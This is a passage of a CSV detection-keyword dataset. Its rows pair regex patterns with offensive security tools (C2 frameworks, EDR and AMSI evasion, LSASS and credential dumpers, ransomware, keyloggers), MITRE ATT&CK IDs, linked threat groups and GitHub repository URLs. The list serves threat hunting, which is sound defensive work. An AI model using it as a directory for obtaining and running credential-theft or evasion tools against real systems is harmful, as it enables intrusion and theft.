Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","52553" "*mythic-docker*",".{0,1000}mythic\-docker.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","52554" "*myz.xcg@gmail.com*",".{0,1000}myz\.xcg\@gmail\.com.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - 
TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#email","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","52555" "*myzxcg/RealBlindingEDR*",".{0,1000}myzxcg\/RealBlindingEDR.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","1","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","52556" "*MzHmO/DebugAmsi*",".{0,1000}MzHmO\/DebugAmsi.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","N/A","10","1","97","22","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z","52558" "*MzHmO/NtlmThief*",".{0,1000}MzHmO\/NtlmThief.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","N/A","10","3","235","33","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z","52559" "*MzHmO/Parasite-Invoke*",".{0,1000}MzHmO\/Parasite\-Invoke.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","52560" "*MzHmO/PowershellKerberos*",".{0,1000}MzHmO\/PowershellKerberos.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black 
Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","52561" "*MzHmO/Privileger*",".{0,1000}MzHmO\/Privileger.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","N/A","8","2","136","32","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z","52562" "*MzHmO/TGSThief*",".{0,1000}MzHmO\/TGSThief.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","N/A","9","2","181","27","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z","52563" "*-n ntds.dit -c hashcat*",".{0,1000}\-n\sntds\.dit\s\-c\shashcat.{0,1000}","offensive_tool_keyword","DPAT","Domain Password Audit Tool for Pentesters","T1003 - T1087 - T1110 - T1555","TA0006 - TA0004 - TA0002 - TA0005","N/A","N/A","Credential Access","https://github.com/clr2of8/DPAT","1","0","N/A","N/A","10","10","954","156","2022-06-24T21:41:43Z","2016-11-22T22:00:21Z","52564" "*n00py/LAPSDumper*",".{0,1000}n00py\/LAPSDumper.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","1","N/A","N/A","10","3","267","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z","52565" "*n00py/Slackor*",".{0,1000}n00py\/Slackor.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","52566" 
"*n0de.exe*elevationstation*",".{0,1000}n0de\.exe.{0,1000}elevationstation.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","52567" "*n1k7l4i/goMatrixC2*",".{0,1000}n1k7l4i\/goMatrixC2.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","N/A","10","","N/A","","","","52568" "*n1k7l4i/goZulipC2*",".{0,1000}n1k7l4i\/goZulipC2.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","N/A","10","","N/A","","","","52569" "*n1nj4sec/mimipy*",".{0,1000}n1nj4sec\/mimipy.{0,1000}","offensive_tool_keyword","mimipy","Tool to dump passwords from various processes memory","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/n1nj4sec/mimipy","1","1","N/A","N/A","10","3","207","36","2017-04-30T00:09:15Z","2017-04-05T21:06:32Z","52570" "*n37sn4k3/BrowserDataGrabber*",".{0,1000}n37sn4k3\/BrowserDataGrabber.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","1","N/A","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","52571" "*nac_bypass*",".{0,1000}nac_bypass.{0,1000}","offensive_tool_keyword","nac_bypass","nac bypass - The basic requirement for an NAC bypass 
is access to a device that has already been authenticated. This device is used to log into the network and then smuggle in network packets from a different device. This involves placing the attacker's system between the network switch and the authenticated device. One way to do this is with a Raspberry Pi and two network adapters","T1550.002 - T1078 - T1133 - T1040 - T1550","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Defense Evasion","https://github.com/scipag/nac_bypass","1","1","N/A","N/A","N/A","3","299","69","2025-02-24T14:17:42Z","2019-01-03T06:55:00Z","52573" "*nachovpn.core.*",".{0,1000}nachovpn\.core\..{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN server","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","0","#content","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","52574" "*nachovpn.local*",".{0,1000}nachovpn\.local.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN server","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","1","N/A","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","52575" "*nachovpn.plugins.*",".{0,1000}nachovpn\.plugins\..{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN server","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","0","#content","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","52576" "*nachovpn/server.py*",".{0,1000}nachovpn\/server\.py.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that
demonstrates exploitation of SSL-VPN clients using a rogue VPN server","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","0","N/A","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","52577" "*nagios-root-privesc.sh*",".{0,1000}nagios\-root\-privesc\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","52578" "*naksyn/Pyramid*",".{0,1000}naksyn\/Pyramid.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","52579" "*Name : UAC Bypass Win Server 2022*",".{0,1000}Name\s\s\s\:\sUAC\sBypass\sWin\sServer\s2022.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","0","#content","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","52580" "*--name chisel -p *",".{0,1000}\-\-name\schisel\s\-p\s.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","52581" "*name of the generated VBA module to include as a
payload*",".{0,1000}name\sof\sthe\sgenerated\sVBA\smodule\sto\sinclude\sas\sa\spayload.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","52582" "*named_pipes.txt*",".{0,1000}named_pipes\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52584" "*NamedPipeImpersonation.cs*",".{0,1000}NamedPipeImpersonation\.cs.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","52585" "*NamedPipeImpersonation.exe*",".{0,1000}NamedPipeImpersonation\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","52586" "*NamedPipeImpersonation.exe*",".{0,1000}NamedPipeImpersonation\.exe.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","52587" "*NamedPipeMaster/releases/download/*",".{0,1000}NamedPipeMaster\/releases\/download\/.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","52588" "*NamedPipeMaster-32bit.zip*",".{0,1000}NamedPipeMaster\-32bit\.zip.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","52589" 
"*NamedPipeMaster-32bit\*",".{0,1000}NamedPipeMaster\-32bit\\.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","52590" "*NamedPipeMaster-64bit.zip*",".{0,1000}NamedPipeMaster\-64bit\.zip.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","52591" "*NamedPipeMaster-64bit\*",".{0,1000}NamedPipeMaster\-64bit\\.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","52592" "*NamedPipeMasterLogger*",".{0,1000}NamedPipeMasterLogger.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","52593" 
"*NamedPipeMaster-main.zip*",".{0,1000}NamedPipeMaster\-main\.zip.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","52594" "*NamedPipePoker.cpp*",".{0,1000}NamedPipePoker\.cpp.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","52595" "*NamedPipePoker.h*",".{0,1000}NamedPipePoker\.h.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","52596" "*NamedPipeProxyPoker*",".{0,1000}NamedPipeProxyPoker.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","52597" "*NamedPipeServer.ps1*",".{0,1000}NamedPipeServer\.ps1.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed 
information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","52598" "*NamelessImplant.dll*",".{0,1000}NamelessImplant\.dll.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","1","N/A","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","52599" "*namelessserver.com*",".{0,1000}namelessserver\.com.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","1","N/A","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","52600" "*NamelessTerminal *",".{0,1000}NamelessTerminal\s\\s\.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","#content","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","52601" "*namespace BackupCreds*",".{0,1000}namespace\sBackupCreds.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","52602" "*namespace CredPhisher*",".{0,1000}namespace\sCredPhisher.{0,1000}","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI 
function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","52603" "*namespace Discord_rat*",".{0,1000}namespace\sDiscord_rat.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","52604" "*namespace hidden_tear*",".{0,1000}namespace\shidden_tear.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","52605" "*namespace hidden_tear.Tools,*",".{0,1000}namespace\shidden_tear\.Tools,.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","52606" "*namespace Jasmin_Encrypter*",".{0,1000}namespace\sJasmin_Encrypter.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","52607" "*namespace 
Keylogger*",".{0,1000}namespace\sKeylogger.{0,1000}","offensive_tool_keyword","SharpLogger","Keylogger written in C#","T1056.001 - T1056.003","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/djhohnstein/SharpLogger","1","0","N/A","N/A","10","2","126","41","2019-12-13T04:40:56Z","2018-12-18T01:45:17Z","52608" "*namespace KrbRelayUp*",".{0,1000}namespace\sKrbRelayUp.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","52609" "*namespace LockLess*",".{0,1000}namespace\sLockLess.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","0","N/A","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","52610" "*namespace NTLMInjector*",".{0,1000}namespace\sNTLMInjector.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","0","N/A","N/A","10","2","167","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z","52611" "*namespace POSTDump*",".{0,1000}namespace\sPOSTDump.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential
Access","https://github.com/YOLOP0wn/POSTDump","1","0","#content","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","52612" "*namespace POSTMiniDump*",".{0,1000}namespace\sPOSTMiniDump.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","#content","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","52613" "*namespace RedPersist.Persist*",".{0,1000}namespace\sRedPersist\.Persist.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","52616" "*namespace RemotePipeList*",".{0,1000}namespace\sRemotePipeList.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","0","#content","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","52617" "*namespace Rubeus*",".{0,1000}namespace\sRubeus.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","52618" "*namespace SafetyDump*",".{0,1000}namespace\sSafetyDump.{0,1000}","offensive_tool_keyword","SafetyDump","in memory process dumper - uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output","T1003.005 - T1059.001 - T1105 - T1071.001","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","0","N/A","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","52619" "*namespace SharpSC*",".{0,1000}namespace\sSharpSC.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. 
(included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","N/A","N/A","8","1","40","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z","52620" "*namespace SharpShares*",".{0,1000}namespace\sSharpShares.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","Black Basta - BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","52621" "*namespace SharpSSDP*",".{0,1000}namespace\sSharpSSDP.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","0","N/A","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","52622" "*namespace SilentCryptoMiner*",".{0,1000}namespace\sSilentCryptoMiner.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","52623" "*namespace WheresMyImplant*",".{0,1000}namespace\sWheresMyImplant.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","52624" "*namespace 
